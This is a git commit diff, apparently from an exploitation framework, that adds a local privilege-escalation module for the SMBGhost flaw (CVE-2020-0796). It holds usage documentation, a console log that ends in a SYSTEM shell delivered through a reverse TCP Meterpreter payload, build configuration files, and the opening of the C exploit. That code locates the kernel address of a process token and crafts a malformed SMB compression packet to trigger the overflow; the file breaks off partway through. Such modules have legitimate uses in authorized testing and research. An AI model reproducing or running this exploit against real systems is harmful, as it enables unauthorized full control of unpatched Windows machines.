Land #13187, Add LPE Exploit For CVE-2020-0796 (AKA: SMBGhost)
Merge branch 'land-13187' into upstream-master
This commit is contained in:
commit
182bd67287
Binary file not shown.
|
@ -0,0 +1,102 @@
|
|||
## Vulnerable Application
|
||||
A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3)
|
||||
protocol that can be leveraged to execute code on a vulnerable server. This
|
||||
local exploit implementation leverages this flaw to elevate itself before
|
||||
injecting a payload into winlogon.exe.
|
||||
|
||||
This vulnerability was patched in March 2020 but prior to that enough
|
||||
information was publicly available to trigger a crash which led to pre-patch
|
||||
workarounds. The official recommendation from [Microsoft][1] at the time was to
|
||||
disable SMBv3 compression, a feature which this exploit relies on. The module's
|
||||
check method will determine this value using the registry to identify whether or
|
||||
not compression has been disabled.
|
||||
|
||||
Other recommendations included restricting access to TCP port 445 via firewalls.
|
||||
Given that this is a local exploit and the connection is made to the local host
|
||||
this is likely an ineffective measure against this particular implementation of
|
||||
the vulnerability.
|
||||
|
||||
### Installation And Setup
|
||||
Windows 10 versions 1903 and 1909 (without the patch) are vulnerable out of the
|
||||
box. The default setting is to have SMBv3 compression enabled.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
1. Get a Meterpreter session on a vulnerable host
|
||||
1. Do: `use exploit/windows/local/cve_2020_0796_smbghost`
|
||||
1. Set the `SESSION` and `PAYLOAD` options
|
||||
1. Do: `run`
|
||||
1. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows 10 Version 1909 Build 18363.418 x64
|
||||
|
||||
```
|
||||
msf5 exploit(windows/local/cve_2020_0796_smbghost) > sessions -i -1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: DESKTOP-PKLKKF7\user
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-PKLKKF7
|
||||
OS : Windows 10 (10.0 Build 18363).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 5
|
||||
Meterpreter : x64/windows
|
||||
meterpreter > getsystem
|
||||
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
|
||||
[-] Named Pipe Impersonation (In Memory/Admin)
|
||||
[-] Named Pipe Impersonation (Dropper/Admin)
|
||||
[-] Token Duplication (In Memory/Admin)
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf5 exploit(windows/local/cve_2020_0796_smbghost) > show options
|
||||
|
||||
Module options (exploit/windows/local/cve_2020_0796_smbghost):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION -1 yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (windows/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Windows 10 v1903-1909 x64
|
||||
|
||||
|
||||
msf5 exploit(windows/local/cve_2020_0796_smbghost) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.159.128:4444
|
||||
[*] Executing automatic check (disable AutoCheck to override)
|
||||
[*] Windows Build Number = 18363
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Launching notepad to host the exploit...
|
||||
[+] Process 4508 launched.
|
||||
[*] Reflectively injecting the exploit DLL into 4508...
|
||||
[*] Injecting exploit into 4508...
|
||||
[*] Exploit injected. Injecting payload into 4508...
|
||||
[*] Payload injected. Executing exploit...
|
||||
[*] Sending stage (206403 bytes) to 192.168.159.153
|
||||
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
[1]: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005
|
|
@ -0,0 +1,31 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.29926.136
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2020-0796", "CVE-2020-0796.vcxproj", "{7282AA86-42B1-4C57-BC33-C01C9233FA5F}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x64.Build.0 = Debug|x64
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x86.Build.0 = Debug|Win32
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x64.ActiveCfg = Release|x64
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x64.Build.0 = Release|x64
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x86.ActiveCfg = Release|Win32
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {485543BE-F94B-499F-95FD-AF81E8ED9B1E}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,252 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<ProjectGuid>{7282AA86-42B1-4C57-BC33-C01C9233FA5F}</ProjectGuid>
|
||||
<RootNamespace>CVE20200796</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<TargetExt>.dll</TargetExt>
|
||||
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<TargetExt>.dll</TargetExt>
|
||||
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<TargetExt>.dll</TargetExt>
|
||||
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<TargetExt>.dll</TargetExt>
|
||||
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<EnableCOMDATFolding>
|
||||
</EnableCOMDATFolding>
|
||||
<OptimizeReferences>
|
||||
</OptimizeReferences>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
|
||||
</Link>
|
||||
<PreLinkEvent>
|
||||
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||
IF EXIST "..\..\..\..\data\exploits\CVE-2020-0796\" GOTO COPY
|
||||
mkdir "..\..\..\..\data\exploits\CVE-2020-0796\"
|
||||
:COPY
|
||||
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\exploits\CVE-2020-0796\"</Command>
|
||||
</PreLinkEvent>
|
||||
<PostBuildEvent>
|
||||
<Command>IF EXIST "..\..\..\..\data\exploits\CVE-2020-0796\" GOTO COPY
|
||||
mkdir "..\..\..\..\data\exploits\CVE-2020-0796\"
|
||||
:COPY
|
||||
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\exploits\CVE-2020-0796\"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<EnableCOMDATFolding>
|
||||
</EnableCOMDATFolding>
|
||||
<OptimizeReferences>
|
||||
</OptimizeReferences>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
|
||||
</Link>
|
||||
<PreLinkEvent>
|
||||
<Command>
|
||||
</Command>
|
||||
</PreLinkEvent>
|
||||
<PostBuildEvent>
|
||||
<Command>IF EXIST "..\..\..\..\data\exploits\CVE-2020-0796\" GOTO COPY
|
||||
mkdir "..\..\..\..\data\exploits\CVE-2020-0796\"
|
||||
:COPY
|
||||
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\exploits\CVE-2020-0796\"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="exploit.c" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="exploit.h" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,366 @@
|
|||
/*
|
||||
* CVE-2020-0796 LPE
|
||||
*
|
||||
* Daniel Garcia Gutierrez (@danigargu) - danigargu[at]gmail.com
|
||||
* Manuel Blanco Parajon (@dialluvioso) - dialluvioso[at]protonmail.com
|
||||
* Date: 03/29/2020
|
||||
*
|
||||
**/
|
||||
|
||||
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
||||
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdint.h>
|
||||
#include <stdlib.h>
|
||||
#include <winsock2.h>
|
||||
#include <ws2tcpip.h>
|
||||
#include <windows.h>
|
||||
#include <TlHelp32.h>
|
||||
#include "exploit.h"
|
||||
|
||||
typedef struct _MSF_PAYLOAD {
|
||||
DWORD dwSize;
|
||||
CHAR cPayloadData[];
|
||||
} MSF_PAYLOAD;
|
||||
typedef MSF_PAYLOAD* PMSF_PAYLOAD;
|
||||
|
||||
ULONG64 get_handle_addr(HANDLE h) {
|
||||
ULONG len = 20;
|
||||
NTSTATUS status = (NTSTATUS)0xc0000004;
|
||||
PSYSTEM_HANDLE_INFORMATION_EX pHandleInfo = NULL;
|
||||
|
||||
HMODULE ntdll = GetModuleHandle("ntdll.dll");
|
||||
if (ntdll == NULL) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
fpNtQuerySystemInformation NtQuerySystemInformation = (fpNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
|
||||
if (NtQuerySystemInformation == NULL) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
do {
|
||||
len *= 2;
|
||||
pHandleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)GlobalAlloc(GMEM_ZEROINIT, len);
|
||||
status = NtQuerySystemInformation(SystemExtendedHandleInformation, pHandleInfo, len, &len);
|
||||
} while (status == (NTSTATUS)0xc0000004);
|
||||
|
||||
if (status != (NTSTATUS)0x0) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
DWORD mypid = GetProcessId(GetCurrentProcess());
|
||||
ULONG64 ptrs[1000] = { 0 };
|
||||
for (int i = 0; i < pHandleInfo->NumberOfHandles; i++) {
|
||||
PVOID object = pHandleInfo->Handles[i].Object;
|
||||
ULONG_PTR handle = pHandleInfo->Handles[i].HandleValue;
|
||||
DWORD pid = (DWORD)pHandleInfo->Handles[i].UniqueProcessId;
|
||||
if (pid != mypid)
|
||||
continue;
|
||||
if (handle == (ULONG_PTR)h)
|
||||
return (ULONG64)object;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
ULONG64 get_process_token() {
|
||||
HANDLE token;
|
||||
HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
|
||||
if (proc == INVALID_HANDLE_VALUE)
|
||||
return 0;
|
||||
|
||||
OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token);
|
||||
return get_handle_addr(token);
|
||||
}
|
||||
|
||||
int error_exit(SOCKET sock) {
|
||||
WSACleanup();
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
int send_negotiation(SOCKET sock) {
|
||||
int err = 0;
|
||||
char response[8] = { 0 };
|
||||
|
||||
const uint8_t buf[] = {
|
||||
/* NetBIOS Wrapper */
|
||||
0x00, /* session */
|
||||
0x00, 0x00, 0xC4, /* length */
|
||||
|
||||
/* SMB Header */
|
||||
0xFE, 0x53, 0x4D, 0x42, /* protocol id */
|
||||
0x40, 0x00, /* structure size, must be 0x40 */
|
||||
0x00, 0x00, /* credit charge */
|
||||
0x00, 0x00, /* channel sequence */
|
||||
0x00, 0x00, /* channel reserved */
|
||||
0x00, 0x00, /* command */
|
||||
0x00, 0x00, /* credits requested */
|
||||
0x00, 0x00, 0x00, 0x00, /* flags */
|
||||
0x00, 0x00, 0x00, 0x00, /* chain offset */
|
||||
0x00, 0x00, 0x00, 0x00, /* message id */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, /* reserved */
|
||||
0x00, 0x00, 0x00, 0x00, /* tree id */
|
||||
0x00, 0x00, 0x00, 0x00, /* session id */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, /* signature */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
|
||||
/* SMB Negotiation Request */
|
||||
0x24, 0x00, /* structure size */
|
||||
0x08, 0x00, /* dialect count, 8 */
|
||||
0x00, 0x00, /* security mode */
|
||||
0x00, 0x00, /* reserved */
|
||||
0x7F, 0x00, 0x00, 0x00, /* capabilities */
|
||||
0x01, 0x02, 0xAB, 0xCD, /* guid */
|
||||
0x01, 0x02, 0xAB, 0xCD,
|
||||
0x01, 0x02, 0xAB, 0xCD,
|
||||
0x01, 0x02, 0xAB, 0xCD,
|
||||
0x78, 0x00, /* negotiate context */
|
||||
0x00, 0x00, /* additional padding */
|
||||
0x02, 0x00, /* negotiate context count */
|
||||
0x00, 0x00, /* reserved 2 */
|
||||
0x02, 0x02, /* dialects, SMB 2.0.2 */
|
||||
0x10, 0x02, /* SMB 2.1 */
|
||||
0x22, 0x02, /* SMB 2.2.2 */
|
||||
0x24, 0x02, /* SMB 2.2.3 */
|
||||
0x00, 0x03, /* SMB 3.0 */
|
||||
0x02, 0x03, /* SMB 3.0.2 */
|
||||
0x10, 0x03, /* SMB 3.0.1 */
|
||||
0x11, 0x03, /* SMB 3.1.1 */
|
||||
0x00, 0x00, 0x00, 0x00, /* padding */
|
||||
|
||||
/* Preauth context */
|
||||
0x01, 0x00, /* type */
|
||||
0x26, 0x00, /* length */
|
||||
0x00, 0x00, 0x00, 0x00, /* reserved */
|
||||
0x01, 0x00, /* hash algorithm count */
|
||||
0x20, 0x00, /* salt length */
|
||||
0x01, 0x00, /* hash algorith, SHA512 */
|
||||
0x00, 0x00, 0x00, 0x00, /* salt */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, /* pad */
|
||||
|
||||
/* Compression context */
|
||||
0x03, 0x00, /* type */
|
||||
0x0E, 0x00, /* length */
|
||||
0x00, 0x00, 0x00, 0x00, /* reserved */
|
||||
0x02, 0x00, /* compression algorithm count */
|
||||
0x00, 0x00, /* padding */
|
||||
0x01, 0x00, 0x00, 0x00, /* flags */
|
||||
0x02, 0x00, /* LZ77 */
|
||||
0x03, 0x00, /* LZ77+Huffman */
|
||||
0x00, 0x00, 0x00, 0x00, /* padding */
|
||||
0x00, 0x00, 0x00, 0x00
|
||||
};
|
||||
|
||||
if ((err = send(sock, (const char*)buf, sizeof(buf), 0)) != SOCKET_ERROR) {
|
||||
recv(sock, response, sizeof(response), 0);
|
||||
}
|
||||
|
||||
return err;
|
||||
}
|
||||
|
||||
int send_compressed(SOCKET sock, unsigned char* buffer, ULONG len) {
|
||||
int err = 0;
|
||||
char response[8] = { 0 };
|
||||
|
||||
const uint8_t buf[] = {
|
||||
/* NetBIOS Wrapper */
|
||||
0x00,
|
||||
0x00, 0x00, 0x33,
|
||||
|
||||
/* SMB Header */
|
||||
0xFC, 0x53, 0x4D, 0x42, /* protocol id */
|
||||
0xFF, 0xFF, 0xFF, 0xFF, /* original decompressed size, trigger arithmetic overflow */
|
||||
0x02, 0x00, /* compression algorithm, LZ77 */
|
||||
0x00, 0x00, /* flags */
|
||||
0x10, 0x00, 0x00, 0x00, /* offset */
|
||||
};
|
||||
|
||||
uint8_t* packet = (uint8_t*)malloc(sizeof(buf) + 0x10 + len);
|
||||
if (packet == NULL) {
|
||||
return error_exit(sock);
|
||||
}
|
||||
|
||||
memcpy(packet, buf, sizeof(buf));
|
||||
*(uint64_t*)(packet + sizeof(buf)) = 0x1FF2FFFFBC;
|
||||
*(uint64_t*)(packet + sizeof(buf) + 0x8) = 0x1FF2FFFFBC;
|
||||
memcpy(packet + sizeof(buf) + 0x10, buffer, len);
|
||||
|
||||
